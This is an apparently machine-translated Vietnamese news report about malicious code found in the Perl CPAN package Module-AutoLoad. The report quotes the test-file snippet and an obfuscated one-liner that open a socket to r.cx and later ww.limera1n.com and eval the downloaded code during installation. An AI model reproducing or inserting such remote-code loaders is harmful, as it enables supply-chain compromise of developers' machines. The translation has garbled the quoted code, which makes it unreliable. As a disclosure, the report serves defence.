Prohoster > Blog > tin tức mạng > Đã phát hiện thấy mã độc hại trong gói Perl-AutoLoad Perl

Đã phát hiện thấy mã độc hại trong gói Perl-AutoLoad Perl

Trong gói Perl được phân phối qua thư mục CPAN Mô-đun-Tự động tải, được thiết kế để tự động tải các mô-đun CPAN một cách nhanh chóng, xác định mã độc. Phần chèn độc hại là thành lập trong mã kiểm tra 05_rcx.t, đã được vận chuyển từ năm 2011.
Đáng chú ý là các câu hỏi về việc tải mã có vấn đề đã nảy sinh trên Stackoverflow trở lại vào năm 2016.

Hoạt động độc hại bắt nguồn từ nỗ lực tải xuống và thực thi mã từ máy chủ của bên thứ ba (http://r.cx:1/) trong quá trình thực thi bộ thử nghiệm được khởi chạy khi cài đặt mô-đun. Người ta cho rằng mã được tải xuống ban đầu từ máy chủ bên ngoài không độc hại, nhưng bây giờ yêu cầu được chuyển hướng đến miền ww.limera1n.com, miền này cung cấp một phần mã để thực thi.

Để tổ chức tải xuống trong một tập tin 05_rcx.t Đoạn mã sau được sử dụng:

$prog của tôi = __FILE__;
$prog =~ s{[^/]+\.t}{../contrib/RCX.pl}x;
$try = `$^X $prog` của tôi;

Mã được chỉ định khiến tập lệnh được thực thi ../contrib/RCX.pl, nội dung của nó được rút gọn thành dòng:

sử dụng lib do{eval&&botstrap("RCX")if$b=new IO::Socket::INET 82.46.99.88.":1″};

Tập lệnh này tải bối rối sử dụng dịch vụ perlobfuscator.com mã từ máy chủ bên ngoài r.cx (mã ký tự 82.46.99.88 tương ứng với văn bản "R.cX") và thực thi nó trong khối eval.

$ perl -MIO::Socket -e’$b=new IO::Socket::INET 82.46.99.88.”:1″; in ;'
eval giải nén u=>q{_<')I;G1[)&(];F5W($E/.CI3;V-K970Z.DE….}

Sau khi giải nén, phần sau đây cuối cùng được thực thi: :

print{$b=new IO::Socket::INET"ww.limera1n.com:80″}"GET /iJailBreak
";evalor return cảnh báo$@while$b;1

Gói có vấn đề hiện đã bị xóa khỏi kho lưu trữ. PAUSE (Máy chủ tải lên của tác giả Perl) và tài khoản của tác giả mô-đun bị chặn. Trong trường hợp này, mô-đun vẫn còn có sẵn trong kho lưu trữ MetaCPAN và có thể được cài đặt trực tiếp từ MetaCPAN bằng một số tiện ích như cpanminus. Nó được ghi nhậnrằng gói đó không được phân phối rộng rãi.

Thú vị để thảo luận đã kết nối và tác giả của mô-đun, người đã phủ nhận thông tin rằng mã độc đã được chèn vào sau khi trang web “r.cx” của anh ấy bị tấn công và giải thích rằng anh ấy chỉ để giải trí và sử dụng perlobfuscator.com không phải để che giấu điều gì đó mà để giảm kích thước của mã và đơn giản hóa việc sao chép nó thông qua khay nhớ tạm. Việc lựa chọn tên hàm “botstrap” được giải thích là do từ này “nghe giống bot và ngắn hơn bootstrap”. Tác giả của mô-đun cũng đảm bảo rằng các thao tác được xác định không thực hiện các hành động độc hại mà chỉ thể hiện việc tải và thực thi mã thông qua TCP.

Nguồn: opennet.ru

Thêm một lời nhận xét